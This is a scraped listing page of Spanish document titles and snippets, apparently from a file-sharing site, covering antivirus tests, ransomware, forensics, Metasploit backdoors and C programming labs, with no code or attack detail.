Información de lanzamiento 1. Mayor estabilidad y fiabilidad Todos los componentes son ahora mucho más estables con el fin de poder resistir ataques de malware específicos que cada vez son más agresivos.
Más detallesPráctica 2: Operaciones Binarias
ITESM Campus Monterrey Depto. de Ing. Eléctrica Laboratorio de Teleingeniería Práctica 2: Operaciones Binarias Objetivo: Comprender las operaciones lógicas básicas, como las compuertas AND, OR, y NOT.
Más detallesUD 1: Adopción de pautas de seguridad informática
UD 1: Adopción de pautas de seguridad informática Análisis forense en sistemas informáticos Análisis forense en sistemas informáticos El análisis forense es la técnica de capturar, procesar e investigar
Más detallesEl Entorno Integrado de Desarrollo Dev-C++ (Ayuda básica para las primeras sesiones de prácticas)
El Entorno Integrado de Desarrollo Dev-C++ (Ayuda básica para las primeras sesiones de prácticas) Sobre Dev-C++ Dev-C++ es un Entorno Integrado de Desarrollo para el lenguaje de programación C/C++ que
Más detalles26 paquetes de seguridad en la primera prueba de seguridad en Windows 8
Prueba: Paquetes de seguridad para Internet 1/2013 26 paquetes de seguridad en la primera prueba de seguridad en Windows 8 Con sus paquetes de seguridad internos compuestos por Defender, las herramientas
Más detallesBuenas Prácticas de Seguridad en el uso de dispositivos móviles. Alfredo Aranguren Tarazona, CISSP, CISA, CISM
Buenas Prácticas de Seguridad en el uso de dispositivos móviles 1 32% de los usuarios creen que no se requiere software de seguridad en sus dispositivos móviles Fuente: McAfee 2 Estado actual de la seguridad
Más detallesRansomware - Virus de la Policía
Madrid, Agosto 2015 Ransomware - Virus de la Policía Un ransomware es un tipo de programa informático malintencionado que restringe el acceso a determinadas partes o archivos del sistema infectado, y pide
Más detallesDetección de malware para Linux
5 de octubre de 2015 Creado por Markus Selinger Linux: 16 paquetes de seguridad puestos a prueba con Windows y Linux Dado que los PCs con Linux se utilizan cada vez más como eslabón de unión entre PCs
Más detallesDejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com
Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador
Más detallesKaspersky Endpoint Security 10 - versión para casa
Kaspersky Endpoint Security 10 - versión para casa Como trabajadores de la UMA se ha llegado a un acuerdo con Kaspersky para que podamos disfrutar de un antivirus completo y con licencia en nuestros ordenadores
Más detallesMalware Analysis (ransomware policía federal )
Malware Analysis (ransomware policía federal ) 6/6/2013 Autor: Alejandro Torres Ramírez (TorresCrack) T: @torrescrack248 http://torrescrack.blogspot.com Resumen La muestra analizada es sobre un ransomware
Más detallesPráctica de Seguridad en Redes
Práctica de Seguridad en Redes Juan Boubeta Puig y Antonio García Domínguez Seguridad y Competencias Profesionales Departamento de Ingenieria Informatica Universidad de Cadiz Curso 2012-2013 1. Descripción
Más detallesFortificar entornos industriales y proteger infraestructuras críticas
Fortificar entornos industriales y proteger infraestructuras críticas Soluciones antimalware off-line y whitelisting de aplicaciones para la protección de servidores/clientes SCADA/Historian/OPC en redes
Más detallesPrácticas de programación en C con MinGW Developer Studio
Prácticas de programación en C con MinGW Developer Studio MinGW Developer Studio es un entorno de desarrollo integrado (IDE) para la programación en lenguaje C gratuito y cómodo de usar. Se ejecuta en
Más detallesReparación de Archivos TPS. Revisión: 6/20/2012
Revisión: 6/20/2012 I Contenido Parte I Introducción 1 1 Notas Importantes... 1 Parte II Descargar archivos necesarios 2 1 Crear Directorio... 2 necesario 2 Accesar a la Página... 2 3 Descomprimir... 5
Más detalles